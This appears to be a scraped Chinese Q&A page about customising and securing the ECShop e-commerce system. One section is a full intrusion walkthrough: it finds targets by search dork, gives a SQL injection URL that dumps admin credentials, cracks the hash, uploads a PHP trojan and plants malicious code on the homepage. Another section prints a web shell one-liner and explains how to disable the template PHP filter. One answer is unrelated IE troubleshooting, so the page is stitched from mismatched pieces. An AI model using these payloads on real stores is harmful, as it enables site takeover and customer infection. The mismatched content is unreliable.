ecshop路由過濾

Ⅰ ecshop 怎麼著不到 get_filter()這個方法

取得上次的過濾條件
admin\includes\lib_main.php文件的第719行

Ⅱ 怎樣調用ecshop商品詳情頁的URL

找個這個文件在根目錄下gods.php
找到
$smarty->assign('promotion_info',get_promotion_info());
在下面加上以下代碼：
$globals['smarty']->assign('ecs_url',$gobals['ecs']->get_domain().$_server['request_uri']);
然後到相應的模板goods.dwt
加上標簽
{$ecs_url}
就可以正常顯示了。
如果需要在其他頁面也加上調用當前url效果，那麼也加上此代碼，加此標簽就可以了。
希望能幫助你，如果出錯截圖錯誤，幫助你或者私信我網路帳號

Ⅲ ecshop留言板添加一項必填項-聯系人,並且留言後,聯系人會在後台顯示出來

ecshop留言板添加一項必填項-聯系人
一、首先要為你的資料庫的ecs_comment增加一個欄位以存儲聯系人姓名：
可以直接在後台-->資料庫管理--->SQL查詢里里直接執行以下sql語句:
alter table ecs_comment add contact varchar(60) not null default '';
此處注意，這條sql語句中的表前綴ecs_要和你網站的前綴一致，不然會報錯，如果你不知道你ecshop網站的數據表前綴
，請看這里

二、修改評論提交表單增加聯系人表單項
打開你網站的themes文件夾,找到你的模板風格，進入裡面，找到message_board.dwt,在
<tr>
<td align="right">{$lang.email}</td>
<td><input name="user_email" type="text" class="inputBg" size="20" value="{$smarty.session.email|escape}" /></td>
</tr>
這段代碼的下方增加

<tr>
<td align="right">聯系人</td>
<td><input name="contact" type="text" class="inputBg" size="20" value="" /></td>
</tr>
然後修改提交評論的js函數為
/**
* 提交留言信息
*/
function submitMsgBoard(frm)
{
var msg = new Object;

msg.user_email = frm.elements['user_email'].value;
msg.contact = frm.elements['contact'].value;
msg.msg_title = frm.elements['msg_title'].value;
msg.msg_content = frm.elements['msg_content'].value;
msg.captcha = frm.elements['captcha'] ? frm.elements['captcha'].value : '';

var msg_err = '';

if (msg.user_email.length > 0)
{
if (!(Utils.isEmail(msg.user_email)))
{
msg_err += msg_error_email + '\n';
}
}
else
{
msg_err += msg_empty_email + '\n';
}
if (msg.contact.length == 0)
{
msg_err += '聯系人不能為空\n';
}
if (msg.msg_title.length == 0)
{
msg_err += msg_title_empty + '\n';
}
if (frm.elements['captcha'] && msg.captcha.length==0)
{
msg_err += msg_captcha_empty + '\n'
}
if (msg.msg_content.length == 0)
{
msg_err += msg_content_empty + '\n'
}
if (msg.msg_title.length > 200)
{
msg_err += msg_title_limit + '\n';
}

if (msg_err.length > 0)
{
alert(msg_err);
return false;
}
else
{
return true;
}
}

三、修改處理評論提交的message.php
if ($action == 'act_add_message')
{
include_once(ROOT_PATH . 'includes/lib_clips.php');

/* 驗證碼防止灌水刷屏 */
if ((intval($_CFG['captcha']) & CAPTCHA_MESSAGE) && gd_version() > 0)
{
include_once('includes/cls_captcha.php');
$validator = new captcha();
if (!$validator->check_word($_POST['captcha']))
{
show_message($_LANG['invalid_captcha']);
}
}
else
{
/* 沒有驗證碼時，用時間來限制機器人發帖或惡意發評論 */
if (!isset($_SESSION['send_time']))
{
$_SESSION['send_time'] = 0;
}

$cur_time = gmtime();
if (($cur_time - $_SESSION['send_time']) < 30) // 小於30秒禁止發評論
{
show_message($_LANG['cmt_spam_warning']);
}
}
$user_name = '';
if (empty($_POST['anonymous']) && !empty($_SESSION['user_name']))
{
$user_name = $_SESSION['user_name'];
}
elseif (!empty($_POST['anonymous']) && !isset($_POST['user_name']))
{
$user_name = $_LANG['anonymous'];
}
elseif (empty($_POST['user_name']))
{
$user_name = $_LANG['anonymous'];
}
else
{
$user_name = htmlspecialchars(trim($_POST['user_name']));
}

$user_id = !empty($_SESSION['user_id']) ? $_SESSION['user_id'] : 0;
$message = array(
'user_id' => $user_id,
'user_name' => $user_name,
'user_email' => isset($_POST['user_email']) ? htmlspecialchars(trim($_POST['user_email'])) : '',
'contact' => isset($_POST['user_email']) ? htmlspecialchars(trim($_POST['contact'])) : '',

'msg_type' => isset($_POST['msg_type']) ? intval($_POST['msg_type']) : 0,
'msg_title' => isset($_POST['msg_title']) ? trim($_POST['msg_title']) : '',
'msg_content' => isset($_POST['msg_content']) ? trim($_POST['msg_content']) : '',
'order_id' => 0,
'msg_area' => 1,
'upload' => array()
);

if (add_message($message))
{
if (intval($_CFG['captcha']) & CAPTCHA_MESSAGE)
{
unset($_SESSION[$validator->session_word]);
}
else
{
$_SESSION['send_time'] = $cur_time;
}
$msg_info = $_CFG['message_check'] ? $_LANG['message_submit_wait'] : $_LANG['message_submit_done'];
show_message($msg_info, $_LANG['message_list_lnk'], 'message.php');
}
else
{
$err->show($_LANG['message_list_lnk'], 'message.php');
}
}

四、增加後台顯示聯系人

a、打開admin/user_msg.php,把
/**
*
*
* @access public
* @param
*
* @return void
*/
function msg_list()
{
/* 過濾條件 */
$filter['keywords'] = empty($_REQUEST['keywords']) ? '' : trim($_REQUEST['keywords']);
if (isset($_REQUEST['is_ajax']) && $_REQUEST['is_ajax'] == 1)
{
$filter['keywords'] = json_str_iconv($filter['keywords']);
}
$filter['msg_type'] = isset($_REQUEST['msg_type']) ? intval($_REQUEST['msg_type']) : -1;
$filter['sort_by'] = empty($_REQUEST['sort_by']) ? 'f.msg_id' : trim($_REQUEST['sort_by']);
$filter['sort_order'] = empty($_REQUEST['sort_order']) ? 'DESC' : trim($_REQUEST['sort_order']);

$where = '';
if ($filter['keywords'])
{
$where .= " AND f.msg_title LIKE '%" . mysql_like_quote($filter['keywords']) . "%' ";
}
if ($filter['msg_type'] != -1)
{
$where .= " AND f.msg_type = '$filter[msg_type]' ";
}

$sql = "SELECT count(*) FROM " .$GLOBALS['ecs']->table('feedback'). " AS f" .
" WHERE parent_id = '0' " . $where;
$filter['record_count'] = $GLOBALS['db']->getOne($sql);

/* 分頁大小 */
$filter = page_and_size($filter);

$sql = "SELECT f.msg_id, f.user_name, f.contact, f.msg_title, f.msg_type, f.order_id, f.msg_status, f.msg_time, f.msg_area, COUNT(r.msg_id) AS reply " .
"FROM " . $GLOBALS['ecs']->table('feedback') . " AS f ".
"LEFT JOIN " . $GLOBALS['ecs']->table('feedback') . " AS r ON r.parent_id=f.msg_id ".
"WHERE f.parent_id = 0 $where " .
"GROUP BY f.msg_id ".
"ORDER by $filter[sort_by] $filter[sort_order] ".
"LIMIT " . $filter['start'] . ', ' . $filter['page_size'];

$msg_list = $GLOBALS['db']->getAll($sql);
foreach ($msg_list AS $key => $value)
{ if($value['order_id'] > 0)
{
$msg_list[$key]['order_sn'] = $GLOBALS['db']->getOne("SELECT order_sn FROM " . $GLOBALS['ecs']->table('order_info') ." WHERE order_id= " .$value['order_id']);
}
$msg_list[$key]['msg_time'] = local_date($GLOBALS['_CFG']['time_format'], $value['msg_time']);
$msg_list[$key]['msg_type'] = $GLOBALS['_LANG']['type'][$value['msg_type']];
}
$filter['keywords'] = stripslashes($filter['keywords']);
$arr = array('msg_list' => $msg_list, 'filter' => $filter, 'page_count' => $filter['page_count'], 'record_count' => $filter['record_count']);

return $arr;
}

b、打開admin/templates/msg_list.htm 把
<td align="center">{$msg.user_name}</td>
改成
<td align="center">{$msg.user_name}<br />{$msg.contact}</td>

Ⅳ 用的是ecshop網店系統，最近網站首頁老是被黑，情況就是index.php給更改內容，請問怎麼解決，急急急！

最近9月份出來的ecshop漏洞,對於2.72 .2.73 3.0 3.6 4.0版本的sql執行getshell漏洞導致的用ecshop程序的網站被入侵 而且網站首頁總是被篡改經常是標題和描述被修改從網路搜索打開網站跳轉到一些博cai網站,應該對轉義函數進行過濾防止post提交生成php腳本木馬文件，而且這個被篡改的問題是反復性質的，清理刪除代碼後沒過多久就又被篡改了。

必須要對程序漏洞的根源問題進行修復網站漏洞,清理已經被上傳的隱蔽性的木馬後門。如果對程序代碼不熟悉的話建議找專業做網站安全公司來處理此問題,國內推薦Sinesafe,綠盟,啟蒙星辰等等。

Ⅳ ecshop安全問題，怎麼讓ecshop不被黑客入侵

1:常常換FTP帳戶密碼。把FTP埠修改掉
2:伺服器安全加強。避免簡單密碼.以及資料庫埠修改
3:伺服器增加VPN登陸
4:修改後台路徑
5:嚴格過濾表單錄入,防止注入
6:設置好程序文件目錄許可權。防止惡意文件運行

Ⅵ php語言，tp框架是單入口文件，那麼ecshop是不是屬於多入口文件的框架

tp是一個單入口的php框架，所有的頁面都是在訪問index.php，然後根據不同的參數請求，走不同的路由，這樣好處理，安全，適應協作開發。

ecshop就不算什麼框架了，只是一個面向過程的一套程序，首頁一個頁面，分類一個頁面，內容頁一個頁，等等，可以說有多少個頁面就有多少個文件。ecshop是十年前的產品，產品的設計理念比較落後。

Ⅶ 怎麼去掉ecshop模板文件過濾php標簽

最好不要在模板裡面寫php。會導致sql注入，引起後台賬號泄露。
ECshop的模板是支持php代碼的，這個給一些不法分子創造了掛馬的機會，這些不法分子掛馬步驟很可能是：
1、通過ecshop的漏洞搞SQL注入，暴出管理員密碼md5值，然後通過**md5得到管理密碼。（注:防止暴出管理密碼md5值的方法是關閉display_errors，並且修改cls_mysql.php里的ErrorMsg函數，注釋掉所有錯誤輸出代碼或把錯誤寫入文件）
2、進入管理後台，通過模板管理－>庫項目管理，編輯lbi文件，添加php代碼，例如<?php @eval($_POST['lx']);?>
3、到這里，就完全控制這個站了，想掛什麼馬就掛什麼馬。
可見，ECshop的模板支持php代碼這點是非常危險的，因此我們應該過濾模板里的所有php代碼。

如果實在要去掉ecshop模板文件過濾php標簽
修改 includes/cls_template.php

可以遵循以下步驟：
去掉第288-299行以下代碼：
if(preg_match_all('~(<\?(?:\w+|=)?|\?>|language\s*=\s*[\"\']?php[\"\']?)~is', $source, $sp_match))
{
$sp_match[1] = array_unique($sp_match[1]);
for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)
{
$source = str_replace($sp_match[1][$curr_sp],'%%%SMARTYSP'.$curr_sp.'%%%',$source);
}
for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)
{
$source= str_replace('%%%SMARTYSP'.$curr_sp.'%%%', '<?php echo \''.str_replace("'", "\'", $sp_match[1][$curr_sp]).'\'; ?>'."\n", $source);
}
}
這樣，模板里的php代碼就被保留了。

Ⅷ ecshop 為什麼用request的用法

一、網路設置的問題

這種原因比較多出現在需要手動指定IP、網關、DNS伺服器聯網方式下，及使用代理伺服器上網的。仔細檢查計算機的網路設置。

二、網路協議和網卡驅動的問題

IE無法瀏覽，有可能是網路協議（特別是TCP/IP協議）或網卡驅動損壞導致，可嘗試重新網卡驅動和網路協議。

三、DNS伺服器的問題

當IE 無法瀏覽網頁時，可先嘗試用IP地址來訪問，如果可以訪問，那麼應該是DNS的問題，造成DNS的問題可能是連網時獲取DNS出錯或DNS伺服器本身問題，這時你可以手動指定DNS服務（地址可以是你當地ISP提供的DNS伺服器地址，也可以用其它地方可正常使用DNS伺服器地址）。在網路的屬性里進行（控制面板—網路和拔號連接—本地連接—右鍵屬性—TCP/IP協議—屬性—使用下面的DNS伺服器地址）。不同的ISP有不同的DNS地址。有時候則是路由器或網卡的問題，無法與ISP的DNS服務連接，這種情況的話，可把路由器關一會再開，或者重新設置路由器。

還有一種可能，是本地 DNS緩存出現了問題。為了提高網站訪問速度，系統會自動將已經訪問過並獲取IP地址的網站存入本地的DNS緩存里，一旦再對這個網站進行訪問，則不再通過DNS伺服器而直接從本地DNS緩存取出該網站的IP地址進行訪問。所以，如果本地DNS緩存出現了問題，會導致網站無法訪問。可以在「運行」中執行 ipconfig /flushdns來重建本地DNS緩存。

四、網路防火牆的問題

如果網路防火牆設置不當，如安全等級過高、不小心把IE放進了阻止訪問列表、錯誤的防火牆策略等，可嘗試檢查策略、降低防火牆安全等級或直接關掉試試是否恢復正常。

五、HOSTS文件的問題

HOSTS文件被修改，也會導致瀏覽的不正常，解決方法當然是清空HOSTS文件里的內容。

六、系統文件的問題

當與IE有關的系統文件被更換或損壞時，會影響到IE正常的使用，這時可使用SFC命令修復一下，WIN98系統可在「運行」中執行SFC，然後執行掃描；WIN2000/XP/2003則在「運行」中執行sfc /scannow嘗試修復。

七、IE瀏覽器本身的問題

當IE瀏覽器本身出現故障時，自然會影響到瀏覽了；或者IE被惡意修改破壞也會導致無法瀏覽網頁。這時可以嘗試用「IE修復專家」來修復（建議到安全模式下修復），或者重裝IE。

Ⅸ 木馬是怎樣攻入Ecshop商城的

Ecshop是一套網路商城建站系統，主要服務於想快捷搭建商城系統的用戶，該系統是個人建立商城的主流軟體。
在網路上，主要有兩種類型的網路購物，一類是像淘寶這樣的C2C站點，另一類是像卓越這樣的B2C站點。B2C站點除了卓越、當當等大型站點外，還有很多規模較小的B2C站點，由於這些中小型B2C站點數目較大，因此每天的成交量也非常可觀。
這些的中小型B2C站點通常沒有專業的建站團隊，站點都是站長通過現成的商城程序搭建起來的，其中Ecshop網路商城系統用得最多，因此一旦這套系統出現安全問題，將會波及網路上所有採用這套系統建立的B2C站點。
但不幸的事情還是發生了，Ecshop出現了嚴重的安全漏洞，黑客可以運用 該漏洞入侵站點，竄改商品價格，更令人擔憂的是該漏洞可以被用來掛馬，所有訪問商城的用戶都會中毒，他們的各種賬號和密碼可能被盜。此外，黑客可以修改站點的支付介面，用戶購買商品時貨款會直接打到黑客的賬戶中。
本文主角：Ecshop商城 V2.5.0
問題所在：含有SQL漏洞
主要危害：用於掛馬、入侵伺服器等
Ecshop存在SQL注入漏洞
運用 Ecshop漏洞須要用到SQL注入。由於程序員的疏忽，沒有對User.php文件中的SQL變數實行過濾，從而導致SQL注入的發生。黑客可以構造特殊的代碼，直接讀取存放在站點資料庫中的管理員賬號和密碼。
漏洞的運用 非常基本，只需在站點地址後輸入「user.php?act=order_query&order_sn=' union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*」這樣一句代碼就可以讀出站點資料庫中的管理員賬號和密碼。
掛馬流程揭秘
第一步：尋找入侵目標
在網路或谷歌中以「Powered by Ecshop v2.5.0」為關鍵字實行搜索(圖1)，可以找到很多符合條件的站點，隨便挑選一個站點作為測試目標。須要留心的是，站點越小安全防護也越弱，成功率相比較較高。

第二步：獲得管理員賬號和密碼
打開測試站點，在其網址後輸入：user.php?act=order_query&order_sn=' union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*。
例如該站點網址為http://www.***.com/，則完整的漏洞運用 地址為：http://www.***.com/ user.php?act=order_query&order_sn=' union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*。
輸入完畢後回車，如果看到類似圖2的界面，則說明漏洞被運用 成功了。在返回的信息中，可以發覺很主要的內容，包括站點管理員的賬號、密碼及E-mail地址。從圖2可以找到，管理員賬號為admin，密碼為。密碼是經過MD5加密的，所以看到的是一串32位長的字元，須要對這串字元實行破解才能看到真實的密碼。

第三步：破解MD5密碼
雖然密碼經過MD5加密，但是通過破解是可以得到密碼原文的。將這段MD5值復制下來，打開MD5在線破解站點 http://www.cmd5.com/。
把這串MD5值復制到站點頁面正中間的文本框中，點擊「MD5加密或解密」按鈕，密碼原文就被破解出來了——admin1234(圖3)。當然，破解MD5值靠的是運氣，如果管理員將密碼配置得很復雜，例如「數字+字母+特殊符號」的組合，那麼就很難破解出密碼原文。

如果MD5在線破解站點無法破解出密碼原文，那麼也可以採用MD5暴力破解軟體來實行破解，當然耗費的時間會很長，在這里就不多作介紹了。
第四步：上傳木馬
既然管理員賬號和密碼都已拿到手，接下來我們就可以登錄站點的後台了。在站點網址後輸入admin並回車，將會出現站點後台登錄頁面，輸入管理員賬號admin、密碼admin1234即可登錄。
來到後台，我們可以看到Ecshop的站點後台功能是非常多的，當然這也給了我們上傳木馬的機會。點擊「系統配置 」中的「Flash播放器管理」鏈接(圖4)。打開後再點擊「添加自定義」按鈕。


這時我們會來到一個上傳圖片的頁面，在這里不僅僅可以上傳圖片，還能輕輕鬆鬆地上傳木馬!這里我們選擇一款功能強大的PHP木馬，點擊「確定」按鈕即可將木馬上傳(圖5)。

上傳成功後，進入「輪播圖片地址」，在這里我們可以看到上傳的木馬的的路徑(圖6)。

將地址復制到瀏覽器地址欄中並打開，可以在裡面任意瀏覽、修改甚至刪除站點中的文件(圖7)，最後就是在站點首頁中插入掛馬代碼，當用戶瀏覽商城首頁的時候，就會激活病毒，病毒會偷偷地入侵用戶的計算機。


防備方案
要修補該漏洞，須要對User.php文件中的SQL變數實行嚴格的過濾，不允許惡意調用變數查詢資料庫。普通讀者在上網時，最好運用能攔截網頁木馬的安全輔助工具，防止網頁木馬的騷擾。

Ⅹ ECShop安全嗎

互聯網上的任務東西都存在在一定的風險，沒有一個絕對的安全；如果你決定使用ecshop的話，我只能給你一些建議。
一，ecshop安裝，其實很簡單，只要一直下一步下一步點擊即可，這樣總是沒有錯的，因為官方不可能給我們一個有問題的程序，盡量從簡即可。
請注意一下兩點
A：在安裝ecshop的時候，不要將所有文件都設置成777。參考ecshop指導，將必須要的文件設置一下即可。
B：安裝ecshop的時候，建議不要用admin用戶名，並設置復雜的密碼
C：mysql資料庫，默認前綴是ecs,建議將他修改成其他的.
二，ecshop網店的安全問題還要設置好網站的目錄許可權
一
般來說，黑客攻擊都會選擇API/CERT/ IMAGES/
JS/LANGUAGES/widget這些文件，所以要設置每一個頁面的許可權，這方面可以參考官方的一些文檔。有php基礎的朋友，可以對
user.php今天修改，對SQL變數進行過濾，可以防止被掛馬。
三，ecshop安全方面的細節
對於ecshop的會員管理方面，一定要及時的清理垃圾信息，這樣的垃圾會員很容易會登入到你的後台，這樣的話後果不堪設想了。
四，ecshop模板與插件
其實這點很是重要，一個商城，模板就是一個門面，外面有太多太多的免費模板與插件，不過可能會有後門的存在，這是有一定風險的。
五，修改登入地址
272版本之後修改後台登錄地址非常方便，步驟如下
1，修改admin文件夾名稱為「68ecshop」
2，打開data/config.php文件，搜裡面所有「admin」字樣改成「68ecshop」字樣就行。
3，這樣訪問域名/68ecshop 即可連接到後台

六，定期更新ecshop補丁。因為ecshop官方是會隨時出安全補丁的，只要定期更新補丁就可以避免由於漏洞的存在遭到入侵了。

設置了以上這些後，你的網站安全系數會得到一個很好的提升。